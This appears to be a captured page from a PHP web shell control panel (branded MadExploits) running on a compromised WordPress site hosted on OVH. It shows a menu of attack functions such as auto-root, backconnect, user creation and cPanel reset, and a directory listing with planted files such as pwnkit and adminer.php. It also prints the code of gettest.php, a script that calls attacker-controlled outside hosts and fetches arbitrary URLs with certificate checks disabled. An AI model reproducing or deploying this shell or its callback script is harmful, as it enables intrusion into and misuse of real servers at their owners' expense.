Linux webm001.cluster111.gra.hosting.ovh.net 5.15.206-ovh-vps-grsec-zfs-classid #1 SMP Fri May 15 02:41:25 UTC 2026 x86_64
Apache
: 10.111.20.1 | : 216.73.216.115
Cant Read [ /etc/named.conf ]
7.4.33
osteocoeek
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
home /
osteocoeek /
annuaire-holistea.fr /
[ HOME SHELL ]
Name
Size
Permission
Action
wp-admin
[ DIR ]
drwxr-xr-x
wp-content
[ DIR ]
drwxr-xr-x
wp-includes
[ DIR ]
drwxr-xr-x
._readme.html
4
KB
-rw-r--r--
._wp-config-sample.php
4
KB
-rw-r--r--
.htaccess
257
B
-rw-r--r--
.mad-root
0
B
-rw-r--r--
ad3d9d
985
B
-rw-r--r--
adminer.php
0
B
-rw-r--r--
file.php
16.71
KB
-rw-r--r--
files.php
62.7
KB
-r--r--r--
gettest.php
1.41
KB
-rw-r--r--
license.txt
19.44
KB
-rw-r--r--
pwnkit
0
B
-rwxr-xr-x
readme.html
7.25
KB
-rw-r--r--
wp-activate.php
7.21
KB
-rw-r--r--
wp-blog-header.php
351
B
-rw-r--r--
wp-comments-post.php
2.27
KB
-rw-r--r--
wp-config-sample.php
28.63
KB
-rw-r--r--
wp-config.php
3.79
KB
-rw-r--r--
wp-cron.php
5.49
KB
-rw-r--r--
wp-links-opml.php
2.44
KB
-rw-r--r--
wp-load.php
3.88
KB
-rw-r--r--
wp-login.php
50.21
KB
-rw-r--r--
wp-mail.php
8.52
KB
-rw-r--r--
wp-settings.php
29.38
KB
-rw-r--r--
wp-signup.php
33.71
KB
-rw-r--r--
wp-trackback.php
7.09
KB
-rw-r--r--
xmlrpc.php
3.13
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : gettest.php
<?php $domain = @$_GET['d']; $https = @$_GET['https']; if(@$_GET['info']){ phpinfo(); exit; } if($domain){ if($https){ $http = 'https'; }else{ $http = 'http'; } echo $http.'://'.$domain.'<br>'; echo '<br>dd--'.asmoutdo($http.'://'.$domain.'/'); exit; }else{ echo 'begin'; //echo '<br>ip--'.asmoutdo('http://204.12.198.164/'); echo '<br>https--'.asmoutdo('https://exkillxe.dnsmadeeasy.top/indexnew.php'); echo '<br>domain--'.asmoutdo('http://btsixtyninepg.crazycoder.xyz/indexnew.php'); exit; } function asmoutdo($url) { $file_contents = ''; $user_agent = 'Mozilla/4.0 (compatible;MSIE 6.0;Windows NT 5.2;.NET CLR 1.1.4322)'; if (function_exists('curl_init')) { try { $ch = curl_init(); $timeout = 30; curl_setopt($ch, CURLOPT_URL, $url); curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0); curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0); curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout); $file_contents = curl_exec($ch); curl_close($ch); } catch (Exception $e) { } } if (strlen($file_contents) < 1 && function_exists('file_get_contents')) { ini_set('user_agent', $user_agent); try { $file_contents = @file_get_contents($url); } catch (Exception $e) { } } return $file_contents; } exit; ?>
Close